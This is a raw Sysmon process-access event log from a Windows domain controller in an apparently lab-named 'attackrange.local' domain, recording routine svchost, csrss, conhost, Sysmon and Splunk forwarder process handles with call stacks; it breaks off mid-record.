13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007776Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007775Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007774Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007773Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007772Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007771Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007770Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007769Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007768Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007767Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007766Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007765Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007764Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.036{10ACEC4A-85F4-5FCF-4F01-000000009101}39324624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007884Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F6-5FCF-5901-000000009101}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007883Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007882Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007881Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007880Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007879Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007878Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007877Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007876Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007875Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007874Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85F6-5FCF-5901-000000009101}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007873Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:06.910{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F6-5FCF-5901-000000009101}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 